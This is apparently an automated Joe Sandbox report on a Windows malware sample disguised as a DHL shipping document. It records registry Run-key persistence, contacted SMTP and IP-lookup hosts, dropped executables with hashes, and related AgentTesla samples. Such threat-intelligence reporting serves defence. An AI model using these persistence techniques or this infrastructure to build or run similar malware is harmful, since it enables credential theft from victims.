                                                                                                    173.231.16.76
                                                                                                    		api4.ipify.orgUnited States
                                                                                                    		18450WEBNXUSfalse

                                                                                                    Private

                                                                                                    IP
                                                                                                    192.168.2.1

                                                                                                    General Information

                                                                                                    Joe Sandbox Version:37.0.0 Beryl
                                                                                                    Analysis ID:830438
                                                                                                    Start date and time:2023-03-20 11:32:07 +01:00
                                                                                                    Joe Sandbox Product:CloudBasic
                                                                                                    Overall analysis duration:0h 11m 0s
                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                    Report type:full
                                                                                                    Cookbook file name:default.jbs
                                                                                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                    Number of analysed new started processes analysed:24
                                                                                                    Number of new started drivers analysed:0
                                                                                                    Number of existing processes analysed:0
                                                                                                    Number of existing drivers analysed:0
                                                                                                    Number of injected processes analysed:0
                                                                                                    Technologies:
                                                                                                    • HCA enabled
                                                                                                    • EGA enabled
                                                                                                    • HDC enabled
                                                                                                    • AMSI enabled
                                                                                                    Analysis Mode:default
                                                                                                    Analysis stop reason:Timeout
                                                                                                    Sample file name:DHL_Shipping_Document2.exe
                                                                                                    Detection:MAL
                                                                                                    Classification:mal100.troj.spyw.evad.winEXE@17/19@19/6
                                                                                                    EGA Information:
                                                                                                    • Successful, ratio: 80%
                                                                                                    HDC Information:Failed
                                                                                                    HCA Information:
                                                                                                    • Successful, ratio: 56%
                                                                                                    • Number of executed functions: 90
                                                                                                    • Number of non-executed functions: 2
                                                                                                    Cookbook Comments:
                                                                                                    • Found application associated with file extension: .exe

                                                                                                    Warnings

                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                                                                                                    • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, ctldl.windowsupdate.com
                                                                                                    • Execution Graph export aborted for target InstallUtil.exe, PID 1764 because it is empty
                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                    • Report size getting too big, too many NtSetInformationFile calls found.

                                                                                                    Simulations

                                                                                                    Behavior and APIs

                                                                                                    TimeTypeDescription
                                                                                                    11:33:43API Interceptor72x Sleep call for process: powershell.exe modified
                                                                                                    11:34:07AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run explorers "C:\Users\user\AppData\Local\explorers.exe"
                                                                                                    11:34:15AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run KbWSe C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe
                                                                                                    11:34:20API Interceptor48x Sleep call for process: Lutyzivrgpnlssvvvftlfile.exe modified
                                                                                                    11:34:24AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run explorers "C:\Users\user\AppData\Local\explorers.exe"
                                                                                                    11:34:32AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run KbWSe C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe
                                                                                                    11:35:07API Interceptor98x Sleep call for process: KbWSe.exe modified

                                                                                                    Joe Sandbox View / Context

                                                                                                    IPs

                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                    208.91.198.1432303-64687.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                      DHL_AWB_copy_&_draft_COO.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                        Enercov_PO_202246755181.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                          JSyBhM74Sj.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                            Statement- Feb 2023.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                              PO_190834253.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                                                wH6Ft5wweX.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                  Remittance_Advice_MT103.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                    9JNEJMGVi4.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                      file.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                        Swift_92be67ab-e027-4955-b6fc-64b.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                          file.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                            vbc.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                              WzmnvvSETF.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                RxcddfrL4j.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                  RU5NzaLwKA.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                                                                    4N8M1a0RZ0.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                      jq5AqYT6rm.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                        Re RETURN PAYMENT TT.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                          n1uELdRRC4.exeGet hashmaliciousAgentTeslaBrowse

                                                                                                                                            Domains

                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                            us2.smtp.mailhostbox.com2303-64687.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                            • 208.91.198.143
                                                                                                                                            DHL_AWB_copy_&_draft_COO.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                            • 208.91.198.143
                                                                                                                                            Enercov_PO_202246755181.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                            • 208.91.198.143
                                                                                                                                            ORIGINAL_SHIPPING_DOCUMENT.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                            • 208.91.199.223
                                                                                                                                            Shipping_doc.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                            • 208.91.199.225
                                                                                                                                            JSyBhM74Sj.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                            • 208.91.198.143
                                                                                                                                            dxet2ADvMO.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                            • 208.91.199.223
                                                                                                                                            Statement- Feb 2023.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                            • 208.91.198.143
                                                                                                                                            PO_190834253.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                                                                            • 208.91.198.143
                                                                                                                                            final_docs..exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                            • 208.91.199.224
                                                                                                                                            SST_Statement-_Feb_2023.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                                                                            • 208.91.199.224
                                                                                                                                            o72aqcE3gB.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                            • 208.91.199.223
                                                                                                                                            wH6Ft5wweX.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                            • 208.91.198.143
                                                                                                                                            r05593373.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                            • 208.91.199.223
                                                                                                                                            INV_50057_0111986532214.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                            • 208.91.199.224
                                                                                                                                            SecuriteInfo.com.Win32.PWSX-gen.32656.4667.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                            • 208.91.199.223
                                                                                                                                            RFQ_080323MECHNBIMar-23.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                                                                            • 208.91.199.225
                                                                                                                                            ARRIVAL_NOTICE_-_BL_-_TSHHKG23020096A_NEW_SHIPMENT_FCL.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                            • 208.91.199.223
                                                                                                                                            PENDING_ORDERS.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                            • 208.91.199.224
                                                                                                                                            Remittance_Advice_MT103.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                            • 208.91.198.143

                                                                                                                                            ASNs

                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                            PUBLIC-DOMAIN-REGISTRYUS2303-64687.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                            • 208.91.198.143
                                                                                                                                            New_Order.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                            • 199.79.62.115
                                                                                                                                            https://www.dr-aljumaa.com/favicon.icoGet hashmaliciousUnknownBrowse
                                                                                                                                            • 162.222.226.174
                                                                                                                                            DHL_AWB_copy_&_draft_COO.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                            • 208.91.198.143
                                                                                                                                            Enercov_PO_202246755181.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                            • 208.91.198.143
                                                                                                                                            http://comfin.mx/notasbancos/16eluniversal14-supConvencionBancaria-bancoppGet hashmaliciousUnknownBrowse
                                                                                                                                            • 199.79.62.169
                                                                                                                                            ORIGINAL_SHIPPING_DOCUMENT.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                            • 208.91.199.224
                                                                                                                                            DISCOUNT_PRICES.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                                                                            • 199.79.62.12
                                                                                                                                            Proforma_Invoice.exeGet hashmaliciousFormBookBrowse
                                                                                                                                            • 216.10.248.111
                                                                                                                                            Shipping_doc.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                            • 208.91.199.223
                                                                                                                                            PURCHASE_CONTRACT.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                            • 199.79.62.12
                                                                                                                                            ARRIVAL_NOTICE.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                            • 199.79.62.12
                                                                                                                                            Proforma_Invoice.exeGet hashmaliciousFormBookBrowse
                                                                                                                                            • 216.10.248.111
                                                                                                                                            https://www.dropbox.com/scl/fi/m5mvxzev2p1sywrwhx645/You-have-received-some-incoming-secured-fax-document.paper?dl=0&rlkey=ssarv205bn9gfqqvovrswidd9Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                            • 103.211.216.141
                                                                                                                                            JSyBhM74Sj.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                            • 208.91.199.223
                                                                                                                                            dxet2ADvMO.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                            • 208.91.199.224
                                                                                                                                            PO2300109.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                            • 199.79.62.12
                                                                                                                                            PO_#JB2210-0005.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                                                                            • 199.79.62.12
                                                                                                                                            URGENT_REGUEST.exeGet hashmaliciousFormBookBrowse
                                                                                                                                            • 216.10.248.111
                                                                                                                                            invoice_and_packing_List.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                            • 199.79.62.12

                                                                                                                                            JA3 Fingerprints

                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                            3b5074b1b5d032e5620f69f9f700ff0ePDA_REQUEST_DISCHARGE_55,000_MT_GRAIN_IN_BULK_pdf.exeGet hashmaliciousVector StealerBrowse
                                                                                                                                            • 104.237.62.211
                                                                                                                                            • 173.231.16.76
                                                                                                                                            PO2023#PREORDER.PDF.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                            • 104.237.62.211
                                                                                                                                            • 173.231.16.76
                                                                                                                                            PO_340166.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                            • 104.237.62.211
                                                                                                                                            • 173.231.16.76
                                                                                                                                            PO_IN34023.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                                                                            • 104.237.62.211
                                                                                                                                            • 173.231.16.76
                                                                                                                                            2303-64687.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                            • 104.237.62.211
                                                                                                                                            • 173.231.16.76
                                                                                                                                            Product_specifications.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                            • 104.237.62.211
                                                                                                                                            • 173.231.16.76
                                                                                                                                            REQUEST_FOR_QUOTE_1603023.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                                                                            • 104.237.62.211
                                                                                                                                            • 173.231.16.76
                                                                                                                                            eRPRiQhQEI.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                            • 104.237.62.211
                                                                                                                                            • 173.231.16.76
                                                                                                                                            INV_SOA.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                            • 104.237.62.211
                                                                                                                                            • 173.231.16.76
                                                                                                                                            IMG_6071220733pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                            • 104.237.62.211
                                                                                                                                            • 173.231.16.76
                                                                                                                                            yeni_sipari#U015f.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                            • 104.237.62.211
                                                                                                                                            • 173.231.16.76
                                                                                                                                            yeni_sipari#U015f.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                            • 104.237.62.211
                                                                                                                                            • 173.231.16.76
                                                                                                                                            DHL_AWB_copy_&_draft_COO.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                            • 104.237.62.211
                                                                                                                                            • 173.231.16.76
                                                                                                                                            bgfbv.exeGet hashmaliciousXmrigBrowse
                                                                                                                                            • 104.237.62.211
                                                                                                                                            • 173.231.16.76
                                                                                                                                            setup.exeGet hashmaliciousXmrigBrowse
                                                                                                                                            • 104.237.62.211
                                                                                                                                            • 173.231.16.76
                                                                                                                                            FixDefError.exeGet hashmaliciousXmrigBrowse
                                                                                                                                            • 104.237.62.211
                                                                                                                                            • 173.231.16.76
                                                                                                                                            0E0BD47371B5E50FC51F147DC456949F8DB70EC27B644.exeGet hashmaliciousRedLineBrowse
                                                                                                                                            • 104.237.62.211
                                                                                                                                            • 173.231.16.76
                                                                                                                                            setup.exeGet hashmaliciousXmrigBrowse
                                                                                                                                            • 104.237.62.211
                                                                                                                                            • 173.231.16.76
                                                                                                                                            315B63093AE9218EBDEAEB5120E17D7FA81BC7BAE694F.exeGet hashmaliciousRedLineBrowse
                                                                                                                                            • 104.237.62.211
                                                                                                                                            • 173.231.16.76
                                                                                                                                            doc10010679052382012143717.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                            • 104.237.62.211
                                                                                                                                            • 173.231.16.76

                                                                                                                                            Dropped Files

                                                                                                                                            No context

                                                                                                                                            Created / dropped Files

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\DHL_Shipping_Document2.exe.log

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\Desktop\DHL_Shipping_Document2.exe
                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                            Category:modified
                                                                                                                                            Size (bytes):1822
                                                                                                                                            Entropy (8bit):5.336325892766998
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:MxHKqmHKww+4YHKGD8AoPtHTG1hAHKKPwayHKHK2uTHKIgiqHKl:iq9qBYqGgAoPtzG1eqKPQqqLqIgVql
                                                                                                                                            MD5:85468146CC471012E4D4ABA011818DFF
                                                                                                                                            SHA1:85E2FBF5FF39B0252076FEDB8DB82829EB7C6064
                                                                                                                                            SHA-256:EF85B0C2AE1A545DF1841D8C1892AECD31782FD6E0648822DD681214B53F42FD
                                                                                                                                            SHA-512:F0FAF6000F4F4D5751E132DEE26322603EB7BDE867ECA589268FD9D24D6D84E8382952C2D6A4D8460F425EAF38D121C3FBF2330C94B342DD82089E80DE4857B4
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..3,"System.Transactions, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Transactions\773cde8eca09561aeac8ad051c091203\System.Transactions.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\4e05e2e48b8a6dd267a8c9e25ef129a7\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\e82398e9ff6885d617e4b97e31fb4f02\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):64
                                                                                                                                            Entropy (8bit):0.34726597513537405
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:Nlll:Nll
                                                                                                                                            MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                                            SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                                            SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                                            SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:@...e...........................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\Lfzmsuaggmw.tmpdb

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3038005, file counter 7, database pages 36, 1st free page 10, free pages 1, cookie 0x29, schema 4, UTF-8, version-valid-for 7
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):147456
                                                                                                                                            Entropy (8bit):0.7217007190866341
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:kab+d5neKTnuRpHDiEwABBE3umab+QuJdi:kab+dVeK8iEZBBjmab+QuJdi
                                                                                                                                            MD5:FEF7F4B210100663DC7731400BAC534E
                                                                                                                                            SHA1:E3F17C46A2DB6861F22B3F4222B97DCB5EBBD47A
                                                                                                                                            SHA-256:E81118F5C967EA342A16BDEFB28919F8039E772F8BDCF4A65684E3F56D31EA0E
                                                                                                                                            SHA-512:6134CC2118FBADD137C4FC3204028B088C7E73A7B985A64D84C60ABD5B1DBFD0AA352C6DF199F43164FEC92378571B5FAC4F801E9AF7BE1DEA8FB6C3C799F695
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:SQLite format 3......@ .......$...........)......................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exe

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\Desktop\DHL_Shipping_Document2.exe
                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):171520
                                                                                                                                            Entropy (8bit):6.183577945077043
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3072:VMzcHTOLfqdPUhGArLfCd4PxZGSXN7+WYEJily6yIFHP6tAbVAAr34uNK:VQcTYfqdPUhGArLfCs7G3E6jJpAs4C
                                                                                                                                            MD5:B1DFD2B85A645040D8C89D0FCED4340A
                                                                                                                                            SHA1:B7363F57984D1853255075D6D0C59488A4764EB7
                                                                                                                                            SHA-256:7091EDED4BED4BF6C218D839FF5E3C98A01119311BC9AEDEABFD48502D3D3E62
                                                                                                                                            SHA-512:A139FDD4836C46FFAB5FC5234AD58592F9A3C175D6F0D3B5223A9D9321621B136C3288F2F24ABC12E0669084E88B5D87B4C68D68DFD75AD4D76EFE9460E8349D
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Z..d..............0.................. ........@.. ....................................@.................................l...O.......F............................................................................ ............... ..H............text....... ...................... ..`.rsrc...F...........................@..@.reloc..............................@..B........................H........................................................................0..I.........+B.....,.(...........,. ....(...........,.(...........,.........,.+.+.*..(....*....0............8.........,*(....~....-........s.........~....o....&.......,.(...........,*(....~....-........s.........~....o....&.......,.sQ................,.~....o_...........,.s^................,.~....oR..........,.~....,+.......,.~....,........,..........,.+.8....*.0..(.........+!.....,.(+..........,........

                                                                                                                                            C:\Users\user\AppData\Local\Temp\Nuaaqwldle.tmpdb

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 2, database pages 23, cookie 0x19, schema 4, UTF-8, version-valid-for 2
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):49152
                                                                                                                                            Entropy (8bit):0.7876734657715041
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:43KzOIIY3HzrkNSs8LKvUf9KnmlG0UX9q4lCm+KLka+yJqhM0ObVEq8Ma0D0HOlx:Sq0NFeymDlGD9qlm+KL2y0Obn8MouO
                                                                                                                                            MD5:CF7758A2FF4A94A5D589DEBAED38F82E
                                                                                                                                            SHA1:D3380E70D0CAEB9AD78D14DD970EA480E08232B8
                                                                                                                                            SHA-256:6CA783B84D01BFCF9AA7185D7857401D336BAD407A182345B97096E1F2502B7F
                                                                                                                                            SHA-512:1D0C49B02A159EEB4AA971980CCA02751973E249422A71A0587EE63986A4A0EB8929458BCC575A9898CE3497CC5BDFB7050DF33DF53F5C88D110F386A0804CBF
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\Spsfpf.tmpdb

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3038005, file counter 7, database pages 36, 1st free page 10, free pages 1, cookie 0x29, schema 4, UTF-8, version-valid-for 7
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):147456
                                                                                                                                            Entropy (8bit):0.7217007190866341
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:kab+d5neKTnuRpHDiEwABBE3umab+QuJdi:kab+dVeK8iEZBBjmab+QuJdi
                                                                                                                                            MD5:FEF7F4B210100663DC7731400BAC534E
                                                                                                                                            SHA1:E3F17C46A2DB6861F22B3F4222B97DCB5EBBD47A
                                                                                                                                            SHA-256:E81118F5C967EA342A16BDEFB28919F8039E772F8BDCF4A65684E3F56D31EA0E
                                                                                                                                            SHA-512:6134CC2118FBADD137C4FC3204028B088C7E73A7B985A64D84C60ABD5B1DBFD0AA352C6DF199F43164FEC92378571B5FAC4F801E9AF7BE1DEA8FB6C3C799F695
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:SQLite format 3......@ .......$...........)......................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\Tbulp.tmpdb

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3038005, file counter 17, database pages 7, 1st free page 5, free pages 2, cookie 0x13, schema 4, UTF-8, version-valid-for 17
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):28672
                                                                                                                                            Entropy (8bit):1.4755077381471955
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:oesz0Rwhba5DX1tHQOd0AS4mcAMmgAU7MxTWbKSS:o+RwE55tHQOKB4mcmgAU7MxTWbNS
                                                                                                                                            MD5:DEE86123FE48584BA0CE07793E703560
                                                                                                                                            SHA1:E80D87A2E55A95BC937AC24525E51AE39D635EF7
                                                                                                                                            SHA-256:60DB12643ECF5B13E6F05E0FBC7E0453D073E0929412E39428D431DB715122C8
                                                                                                                                            SHA-512:65649B808C7AB01A65D18BF259BF98A4E395B091D17E49849573275B7B93238C3C9D1E5592B340ABCE3195F183943CA8FB18C1C6C2B5974B04FE99FCCF582BFB
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................[5.........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\Unjsdaqackg.tmpdb

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 4, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 4
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):94208
                                                                                                                                            Entropy (8bit):1.2882898331044472
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:go1/8dpUXbSzTPJPn6UVuUhoEwn7PrH944:gS/inPvVuUhoEwn7b944
                                                                                                                                            MD5:4822E6A71C88A4AB8A27F90192B5A3B3
                                                                                                                                            SHA1:CC07E541426BFF64981CE6DE7D879306C716B6B9
                                                                                                                                            SHA-256:A6E2CCBD736E5892E658020543F4DF20BB422253CAC06B37398AA4935987446E
                                                                                                                                            SHA-512:C4FCA0DBC8A6B00383B593046E30C5754D570AA2009D4E26460833FB1394D348776400174C898701F621C305F53DC03C1B42CF76AA5DC33D5CCD8FA44935B03C
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\Xubyeworypu.tmpdb

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 4, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 4
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):94208
                                                                                                                                            Entropy (8bit):1.2882898331044472
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:go1/8dpUXbSzTPJPn6UVuUhoEwn7PrH944:gS/inPvVuUhoEwn7b944
                                                                                                                                            MD5:4822E6A71C88A4AB8A27F90192B5A3B3
                                                                                                                                            SHA1:CC07E541426BFF64981CE6DE7D879306C716B6B9
                                                                                                                                            SHA-256:A6E2CCBD736E5892E658020543F4DF20BB422253CAC06B37398AA4935987446E
                                                                                                                                            SHA-512:C4FCA0DBC8A6B00383B593046E30C5754D570AA2009D4E26460833FB1394D348776400174C898701F621C305F53DC03C1B42CF76AA5DC33D5CCD8FA44935B03C
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l2ttahu3.os5.psm1

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:very short file (no magic)
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1
                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:U:U
                                                                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:1

                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_r3xwgy1n.5xh.ps1

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:very short file (no magic)
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1
                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:U:U
                                                                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
